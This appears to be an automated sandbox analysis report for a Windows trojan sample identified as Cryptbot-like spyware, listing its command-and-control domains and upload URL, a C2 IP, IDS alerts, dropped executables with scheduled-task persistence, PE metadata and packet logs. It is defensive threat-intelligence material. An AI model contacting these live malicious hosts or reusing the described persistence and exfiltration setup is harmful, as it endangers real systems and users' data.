Name	Malicious	Antivirus Detection	Reputation
7sb.top	true	1%, Virustotal, Browse	unknown
sevtbb17sb.top	true		unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
oosevtbb17sb.top	true		unknown
+sevtbb17sb.top	true		unknown
ozsevtbb17sb.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	ZBldshzBAkDNcchezeGR.dll.0.dr	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/v1/upload.php	file.exe, 00000000.00000002.2514835607.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://keruzam.com/update.php?compName=	file.exe, file.exe, 00000000.00000003.2513275016.000000006A367000.00000002.00001000.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.phpB	file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/0/	file.exe, 00000000.00000002.2514835607.0000000001AEB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/./	file.exe, 00000000.00000002.2514835607.0000000001AEB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/v1/upload.phpL	file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/v1/upload.phpP	file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.phpV	file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/	file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2514835607.0000000001AEB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/I	file.exe, 00000000.00000002.2514835607.0000000001A94000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.46.218.44	sevtbb17sb.top	Spain		203178	CUBENODEES	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1538133
Start date and time:	2024-10-20 15:24:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 7472 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:25:07	API Interceptor	21x Sleep call for process: file.exe modified
09:26:57	API Interceptor	91x Sleep call for process: service123.exe modified
14:26:26	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CUBENODEES	sh4.elf	Get hash	malicious	Mirai	Browse	213.220.16.0
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	213.220.10.117
	w4DO1Z18yg.wsf	Get hash	malicious	SmokeLoader	Browse	193.46.217.78
	UkHkCa3IYV.wsf	Get hash	malicious	SmokeLoader	Browse	193.46.217.78
	3312.PDF.wsf	Get hash	malicious	SmokeLoader	Browse	193.46.217.78
	RmbF3635xY.exe	Get hash	malicious	SmokeLoader	Browse	193.46.217.78
	https://public-usa.mkt.dynamics.com/api/orgs/656e8c66-5e77-ef11-ac1e-6045bd080c27/r/lmUG5F4EgUesqGwuJA5PigEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fcrm.interactivaclic.com%252Fn%252F%253Fc3Y9bzM2NV8xX29uZSZyYW5kPVNUVjBVakk9JnVpZD1VU0VSMjMwOTIwMjRVMjYwOTIzMjE%253DN0123N%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=HTFuI1dWNsWznL3K1x2s1mvQbKix%2BdykwHJYfkmm7o4%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee	Get hash	malicious	Unknown	Browse	89.44.32.18
	cFvDKWB1V8.ps1	Get hash	malicious	XWorm	Browse	83.147.55.182
	New_Document-660111409161.wsf	Get hash	malicious	XWorm	Browse	83.147.55.182
	sora.arm.elf	Get hash	malicious	Mirai	Browse	83.147.57.108

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.054316729611788114
Encrypted:	false
SSDEEP:	24576:YnUXLEB2/Zk1K2dZcqzHc+TscyhYB1UW0n/pwfmyVVzOKujrc7rqagDdorvIxwJ6:YhHyuIW0nefNVNUl8VE
MD5:	4DAD23FDE17B96EC1626D8667A702D4F
SHA1:	57DBB5A6BACD4A925EB1D3D8775F3D83D36868C3
SHA-256:	27B5A52D7CEDFFDCBEC392250C1285356AACA80E4BD7FCF18D79641B75BC1898
SHA-512:	5FAE30EEB0ABDF4CF22076FA1CA4168537C38C614A2C1A025EED7C8FDE4B695ECB81B9EF81416081DED61AF3A94F4B2929CD90EB81A60A131365DFA30EA50C0C
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........#...(...........................p.........................@............@... .........................`.......................................Hz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Hz.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.002340554026806453
Encrypted:	false
SSDEEP:
MD5:	F5C1A872DFB371DD7C67A5060BBCAA88
SHA1:	F4B1DB16509896DC749874CF61C9699948F53BEE
SHA-256:	3479607CAA51483740173E98B58CC741D0F7F6AB567931757275D15637082703
SHA-512:	18ABFE787290AFE017CDC7AE96CBE8865A97C06B688C28F90A840D10AFCD79BB4B6D41F01B163341ACD7582347E3002B7B42F7A8399901AC3484B495E1A8CEAF
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.608059037104508
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	6'664'192 bytes
MD5:	b00d4277cdeb811fdccc08e336223231
SHA1:	cb57043aae0a7feb24ab3b2a3593517f491f3864
SHA256:	992bd4bb6280e1d946ce2a65c5ee6c620b3074a3195c96595f3396ce33369922
SHA512:	4ad16aac0ff10b49049ae80612bca990f6044ae0e9f7ffe25d1947f019f2c211b51af230ba9a625fd04657c5df45bec7dd1633e59f3b5421022a0e606d126310
SSDEEP:	49152:PqwJ29pmtJa0vG2PkxKzMOaKRhpuevH3nUk0gdg2GeP/4scMlVFty:vcmtJaeGkGKzVa
TLSH:	3C663F76DDDF01EAC6C32ABD805AF27F6930AB019C38C2BDCE55DB50D351E22D68A815
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...............(."M...e..............@M...@.......................... f......Cf...@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6714B8CD [Sun Oct 20 08:01:17 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	41db2083dac89343aef584a51a80b293

Entrypoint Preview

Instruction
mov dword ptr [009F2070h], 00000001h
jmp 00007F8EF0D37E36h
nop
mov dword ptr [009F2070h], 00000000h
jmp 00007F8EF0D37E26h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F8EF0D464DEh
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 009DF000h
call dword ptr [009F323Ch]
sub esp, 04h
test eax, eax
je 00007F8EF0D381F5h
mov ebx, eax
mov dword ptr [esp], 009DF000h
call dword ptr [009F3270h]
mov edi, dword ptr [009F3248h]
sub esp, 04h
mov dword ptr [009F2028h], eax
mov dword ptr [esp+04h], 009DF013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 009DF029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [008D4004h], eax
test esi, esi
je 00007F8EF0D38193h
mov dword ptr [esp+04h], 009F202Ch
mov dword ptr [esp], 009EF104h
call esi
mov dword ptr [esp], 00401580h
call 00007F8EF0D380E3h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5f3000	0xb78	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5f6000	0x6b4e8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5ed624	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5f321c	0x1cc	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4d20a8	0x4d2200	8cac156bca4602118e7c426d5581ce5e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4d4000	0x10a8e0	0x10aa00	a7e8a0e5ed2f48aad162befdd9939418	False	0.04768262130801688	dBase III DBT, version number 0, next free block index 10, 1st item "\340\265A"	0.7012128704930494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5df000	0xf704	0xf800	f97124209c51fcb3aedcc9c62d68627b	False	0.25045677923387094	data	5.854133902889109	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x5ef000	0x210c	0x2200	926911c88176c242cbf5e63c0af486fa	False	0.32019761029411764	data	4.799107659496344	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x5f2000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5f3000	0xb78	0xc00	3b675c8c40f6f1d35ed6d2f98cad30bc	False	0.4039713541666667	data	5.051501063991236	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x5f4000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x5f5000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5f6000	0x6b4e8	0x6b600	ae7e282191104d3c2062730dcebc8f7c	False	0.15192083818393481	data	6.794555081546827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetNativeSystemInfo, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetThreadLocale, HeapAlloc, HeapFree, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, _wcsnicmp, abort, atoi, bsearch, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, mbstowcs, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, qsort, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-20T15:25:10.872239+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49730	193.46.218.44	80	TCP
2024-10-20T15:25:12.168867+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49731	193.46.218.44	80	TCP
2024-10-20T15:25:14.218664+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49732	193.46.218.44	80	TCP
2024-10-20T15:25:15.483557+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49733	193.46.218.44	80	TCP
2024-10-20T15:25:16.760159+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49734	193.46.218.44	80	TCP
2024-10-20T15:25:18.226595+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49735	193.46.218.44	80	TCP
2024-10-20T15:25:20.334637+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49738	193.46.218.44	80	TCP
2024-10-20T15:25:22.098674+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49741	193.46.218.44	80	TCP
2024-10-20T15:25:23.733683+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49744	193.46.218.44	80	TCP
2024-10-20T15:25:27.826252+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49748	193.46.218.44	80	TCP
2024-10-20T15:25:29.449127+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49750	193.46.218.44	80	TCP
2024-10-20T15:25:30.985360+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49752	193.46.218.44	80	TCP
2024-10-20T15:25:32.634600+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49754	193.46.218.44	80	TCP
2024-10-20T15:25:34.042772+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49755	193.46.218.44	80	TCP
2024-10-20T15:25:35.613560+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49756	193.46.218.44	80	TCP
2024-10-20T15:25:37.091890+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49757	193.46.218.44	80	TCP
2024-10-20T15:25:38.607562+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49758	193.46.218.44	80	TCP
2024-10-20T15:25:40.064762+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49759	193.46.218.44	80	TCP
2024-10-20T15:25:41.567323+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49760	193.46.218.44	80	TCP
2024-10-20T15:25:43.004739+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49761	193.46.218.44	80	TCP
2024-10-20T15:25:44.455495+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49762	193.46.218.44	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 20, 2024 15:25:09.703942060 CEST	49730	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:09.708867073 CEST	80	49730	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:09.708967924 CEST	49730	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:09.709619045 CEST	49730	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:09.709670067 CEST	49730	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:09.714477062 CEST	80	49730	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:09.714509010 CEST	80	49730	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:10.872167110 CEST	80	49730	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:10.872239113 CEST	49730	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:10.873785973 CEST	49730	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:10.878590107 CEST	80	49730	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:10.978221893 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:10.983259916 CEST	80	49731	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:10.983361959 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:10.983464003 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:10.983464003 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:10.988384008 CEST	80	49731	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:10.988414049 CEST	80	49731	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:12.168734074 CEST	80	49731	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:12.168867111 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:12.168937922 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:12.173964977 CEST	80	49731	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:12.275607109 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:12.280733109 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:12.280818939 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:12.281105042 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:12.281136036 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:12.286060095 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:12.286091089 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:14.218540907 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:14.218663931 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:14.218776941 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:14.220762014 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:14.220818043 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:14.221132994 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:14.221182108 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:14.224184990 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:14.322082043 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:14.327090979 CEST	80	49733	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:14.327166080 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:14.327316046 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:14.327334881 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:14.332742929 CEST	80	49733	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:14.332797050 CEST	80	49733	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:15.483470917 CEST	80	49733	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:15.483556986 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:15.483628035 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:15.488534927 CEST	80	49733	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:15.587439060 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:15.592391968 CEST	80	49734	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:15.592479944 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:15.592658043 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:15.592689037 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:15.597533941 CEST	80	49734	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:15.597580910 CEST	80	49734	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:16.759891987 CEST	80	49734	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:16.760159016 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:16.766133070 CEST	80	49734	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:16.766199112 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.166779995 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.171880007 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.171969891 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.172220945 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.172296047 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.177092075 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.177148104 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.177264929 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.177294970 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.177323103 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.177336931 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.177345037 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.177372932 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.177401066 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.177433968 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.177449942 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.177469969 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.177500010 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.177526951 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.177552938 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.177570105 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.181854010 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.181927919 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.182018995 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.182090044 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.182249069 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.182317972 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.182411909 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.182440996 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.182492971 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.182498932 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.182512999 CEST	49735	80	192.168.2.4	193.46.218.44
